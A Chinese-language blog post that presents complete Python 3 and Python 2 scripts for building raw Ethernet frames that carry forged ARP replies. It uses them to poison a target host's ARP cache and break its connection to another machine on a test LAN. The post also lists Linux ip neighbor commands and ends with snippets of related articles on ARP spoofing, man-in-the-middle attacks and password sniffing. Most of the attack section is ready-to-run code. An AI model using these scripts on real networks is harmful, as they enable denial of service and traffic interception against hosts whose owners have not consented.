基于python发送ARP欺骗消息

最新推荐文章于 2024-08-20 23:39:18 发布
最新推荐文章于 2024-08-20 23:39:18 发布
阅读量1.9k 收藏 14
点赞数 5
分类专栏: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xyjincan/article/details/90691422
版权

基于python发送ARP欺骗消息

测试通过发送ARP欺骗数据包阻断局域网两台机器的连接

利用linux下python的socket标准库(socket.socket(socket.AF_PACKET, socket.SOCK_RAW)),发送自定义数据包到目标机器完成欺骗测试尝试,主要代码参考如下。

发送arp欺骗包

发送arp欺骗包

攻击成功后,18与19之前通信中断

攻击成功后,18与19之前通信中断

18主机上ARP变更情况

18主机上ARP变更情况

python3发送arp欺骗

# -*- coding: utf-8 -*-  
## root@linux python3
import socket

def send_arp_is_at():
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    ### 数据包出口网卡
    s.bind(("ens37", 0))
    ## 虚假IP
    #src_ip_addr = b"\x0a\x0a\x01\x13"
    src_ip_addr = ip2bin_ip("10.10.1.19")
    ##  虚假MAC地址(使目标虚假IP与被欺骗主机IP通信中断)
    #dst_mac_addr = b"\x00\x0c\x29\x05\x11\x00"
    dst_mac_addr = mac2bin_mac("00:0c:29:05:11:00")
	
    ## 即将被欺骗的主机的IP
    dst_ip_addr = ip2bin_ip("10.10.1.18")
    ##  即将被欺骗方的MAC地址
    src_mac_addr = mac2bin_mac("00:0c:29:05:6c:36")
    ## arp 回应
    arp_opcode = b"\x00\x02"
    s.send(src_mac_addr+dst_mac_addr+b"\x08\x06\x00\x01\x08\x00\x06\x04"+arp_opcode+dst_mac_addr+src_ip_addr+src_mac_addr+dst_ip_addr+b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
    print('send send_arp_is_at')

# transfer ip to bin_ip
def ip2bin_ip(ip):
    ip_list=ip.split('.')
    result_arr = b"";
    for i in range(4):  #0,1,2,3
        tnum = int(ip_list[i])
        bnum = tnum.to_bytes(1, byteorder = 'big', signed = False)
        result_arr = result_arr + bnum
    return result_arr

# transfer mac to bin_mac
def mac2bin_mac(mac):
    mac_list=mac.split(':')
    result_arr = b"";
    for i in range(6):  #0,1,2,3,4,5
        hexnum = mac_list[i]
        result_arr = result_arr + bytearray.fromhex(hexnum)
    return result_arr

if __name__ == '__main__':
    ## 发送欺骗包(使用root账户)
    send_arp_is_at()
    print("done");

python2发送arp欺骗


# -*- coding: utf-8 -*-  

## root@linux python2
import socket
import binascii


## ens37
##  10.10.1.19     \x0a\x0a\x01\x13 00:50:56:3a:11:09
##  10.10.1.18 \x0a\x0a\x01\x12  00:0c:29:05:6c:36        

def send_arp_is_at():
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    ### 数据包出口网卡
    s.bind(("ens37", 0))
    ## 虚假IP
    src_ip_addr = ip2bin_ip("10.10.1.19")
    ##  虚假MAC地址(使虚假IP与被欺骗主机IP通信中断)
    dst_mac_addr = mac2bin_mac("00:0c:29:05:11:00")
    #src_ip_addr = "\x0a\x0a\x01\x13"
    #dst_mac_addr = "\x00\x0c\x29\x05\x11\x00"
    ## 即将被欺骗的主机的IP
    dst_ip_addr = ip2bin_ip("10.10.1.18")
    ##  即将被欺骗方的MAC地址
    src_mac_addr = mac2bin_mac("00:0c:29:05:6c:36")
    ## arp 回应
    arp_opcode = "\x00\x02"
    s.send(src_mac_addr+dst_mac_addr+"\x08\x06\x00\x01\x08\x00\x06\x04"+arp_opcode+dst_mac_addr+src_ip_addr+src_mac_addr+dst_ip_addr+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
    print('send send_arp_is_at')

## "00:0c:29:05:6c:36" to  str "\x00\x0c\x29\x05\x6c\x36"
def mac2bin_mac(mac):
    hexmac = mac.replace(':', "")
    return binascii.a2b_hex(hexmac)

## 10.10.1.18 to str "\x0a\x0a\x01\x12"
def ip2bin_ip(ip):

    ipns = ip.split('.')
    result_arr = "";
    for i in range(4):  #0,1,2,3
        tnum = int(ipns[i])
        bnum = hex(tnum)
        if(len(bnum)==3):
            bnum = "0x0" + bnum[2]
        result_arr = result_arr + bnum
    result_arr = result_arr.replace("0x","")
    return binascii.a2b_hex(result_arr)

if __name__ == '__main__':
    ## 发送欺骗包(使用root账户)
    send_arp_is_at()
    print("done");

Centos7 ip命令参考

## 查看ARP列表
ip neighbor show
## 清除ens37网口全部的ARP缓存
ip neighbor flush  dev ens37
## 关闭ens37网口
ip l set ens37 down
## 启用ens37网口
ip l set ens37 up
xyjincan
关注
专栏目录
pythonarp欺骗
willow_liang的博客
11-03 553
kali使用Ettercap进行arp欺骗 192.168.0.105加入target1,192.168.0.1网关加入target2 点击MITM中的ARP windows7查看mac地址已经发生变化 可以用driftnet查看被攻击的win7访问网页的图片,最新版的kali未安装该软件,实际测试该软件应该只能查看一些加密不严格的网站 或者使用wireshark抓包嗅探 win7登录dvwa过程,可在kali抓包嗅探到 python编写arp欺骗脚本 srp发送数据包 verbose不显
Python实现ARP欺骗
xiaoxiao的博客
04-02 6769
实验目的:局域网段扫描,利用arp欺骗抓包获取密码 :局域网上的一台主机,如果接收到一个ARP报文,即使该报文不是该主机所发送ARP请求的应答报文,该主机也会将ARP报文中的发送者的MAC地址和IP地址更新或加入到ARP表中。ARP欺骗攻击就利用了这点,攻击者主动发送ARP报文。通过不断发送这些伪造的ARP报文,让局域网上所有的主机和网关ARP表,其对应的MAC地址均为攻击者的MAC地址,这样所...
python发送arp报文_python发送伪造的arp请求 -电脑资料
weixin_29940173的博客
03-02 172
复制代码代码如下:#!/usr/bin/env pythonimport sockets = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)s.bind(("lo", 0))src_addr = "\x50\x3d\xe5\x0e\x35\x3f"dst_addr = "\xff\xff\xff\xff\xff\xff"ethertype = "\...
HCIA--实验三:通过实验理解ARP协议
最新发布
bite_joker_xue的博客
08-20 371
Tips:ARP协议(address resolution protocol):地址解析协议;即把IP地址转换为MAC地址。本实验查看arp表的命令:arp -a。
python arp_在python上发出ARP请求
weixin_39815925的博客
12-05 543
我试图在python上发出ARP请求。我的代码:import socketfrom struct import packfrom uuid import getnode as get_macdef main():dest_ip = [10, 7, 31, 99]local_mac = [int(("%x" % get_mac())[i:i+2], 16) for i in range(0, 12,...
python发送arp
weixin_43803070的博客
07-19 2268
import os from scapy.all import * import sys from threading import Thread from optparse import OptionParser def sweep(ip) try: pakt=Ether(dst="ff:ff:ff:ff:ff:ff",src="00:0c:29:b6:71:0c")/ip(...
python发送伪造的arp请求
12-25
复制代码 代码如下:#!/usr/bin/env pythonimport socket s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)s.bind((“lo”, 0)) src_addr = “\x50\x3d\xe5\x0e\x35\x3f”dst_addr = “\xff\xff\xff\xff\xff\xff”ethertype = “\x08\x06” s.send(dst_addr+src_addr+ethertype+”\x00\x01″+”\x08\x00″+”\x06″+”\x04″+”\x00\x01″+src_ad
arp欺骗python脚本
04-24
使用python进行arp欺骗,脚本效率一般,初学者可以好好理解。
python编写arp攻击与欺骗脚本
dhdichch的博客
05-29 2971
目录 1.arp欺骗 2.arp欺骗实验 2.1 构造arp包 2.2 发送数据包 2.3 查看路由表 3.完善arp欺骗过程 4. 编写arp欺骗脚本 1.arp欺骗 arp欺骗是数据链路层的攻击,在数据链路层是通过mac地址来发送报文的,所以需要将网络层的ip对应到mac地址,由于arp协议是基于局域网内主机互相信任的基础上的,如果我们构造并发送了一个arp欺骗包,就可以实现arp欺骗。 2.arp欺骗实验 攻击者:kali,192.168.20.128,29:...
编写Python渗透测试工具之ARP欺骗工具
玄道的网安博客
02-21 2275
本文将用Python中的Scapy模块编写。 用一张图简单介绍一下ARP的攻击原理: 这时候,受害者的流量全部经过攻击者机,卖家发给受害者的流量也会经过攻击者机的手上。从而让受害者无法与网关联系,导致流量无法到达受害者机上。而攻击者却能拿到网段所有流量。 ARP数据的详细信息列表: 参数 注释 Hardware type ...
Python-KickThemOut通过执行ARP欺骗攻击来把设备从你的网络中踢掉
08-10
总之,KickThemOut是一个基于Python的实用工具,用于执行ARP欺骗,虽然它可以用于合法的网络管理目的,但同时也可能被滥用。理解ARP欺骗的原理和防范措施对于维护网络安全至关重要。在使用这类工具时,应遵守相关...
python之最简单实现arp攻击
05-30
原来我实现的时候都写了一大堆,今天想到了最简单实现的方法,分享给大家
python网络编程——实现ARP协议
12-23
主要思路: 1.通过python psutil模块,并对网卡名称进行筛选得到对应网卡的IP地址和MAC地址 2.使用scapy库中的srp()函数发送二层数据包并获得返回值 3.使用type()函数分析返回值类型,查询对应的类中的方法,来提取关键信息 发送包的属性可以在scapy中查询,如: 查询本机对应网卡,IP,MAC 代码: import psutil def get_local(ifname): dic = psutil.net_if_addrs() for adapter in dic: if adapter == ifname:
基于Python网络编码技术的数据链路层ARP攻击行为研究.zip
10-16
通过发送ARP请求,源设备可以获取到目标设备的MAC地址,然后进行数据传输。 然而,ARP协议的一个弱点在于其信任性。任何设备都可以发送一个虚假的ARP响应,声称自己是其他设备,这种欺骗行为被称为ARP欺骗。攻击者...
pythonarp欺骗_Python3 小工具-ARP欺骗
weixin_39900582的博客
12-16 119
在kali中使用from scapy.all import *import optparseimport osdef send(pkt,interface):for p in pkt:sendp(p,iface=interface)def req(targets,source):for target in targets:tr_mac=getmacbyip(target)pkt=Ether(dst...
python实现ARP欺骗
weixin_30457065的博客
08-27 592
首先介绍一个python第三方库--Scapy,这个库不是标准库,默认是没有的,需要安装,不过在kali-linux里边是默认安装的, 这里我用kali做攻击者,xp做受害者 关于Scapy Scapy是一个功能强大的交互式数据包操作程序。它能够伪造或解码大量协议的数据包,通过线路发送它们,捕获它们,匹配请求和回复等等。它可以轻松处理大多数经典任务,如扫描,跟踪路由,探测,单元测试,攻击或网...
使用python实现arp欺骗
xiaoantongxueqaq的博客
04-30 3021
实验拓扑: 1.首先进行ping测试网关和kali,来获取mac地址 ping 192.168.72.131 ping 192.168.72.20 MAC地址对应结果如下: 2.进行使用脚本中间人欺骗,脚本放在最后 3.查看欺骗后的arp表,R1和PC1都认为对方的mac地址是7B-26,也就是kali的mac python脚本: import sys import time from scapy.all import sendp, AR...
python arp攻击_用python实现ARP欺骗
weixin_39517202的博客
11-30 380
首先介绍一个python第三方库--Scapy,这个库不是标准库,默认是没有的,需要安装,不过在kali-linux里边是默认安装的,这里我用kali做攻击者,xp做受害者关于ScapyScapy是一个功能强大的交互式数据包操作程序。它能够伪造或解码大量协议的数据包,通过线路发送它们,捕获它们,匹配请求和回复等等。它可以轻松处理大多数经典任务,如扫描,跟踪路由,探测,单元测试,攻击或网络发现(它可...
利用 Python 开发包 Scapy 实现 ARP 欺骗_python实现ip欺骗检测(1)
2401_84254011的博客
04-11 804
sendp(p1)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值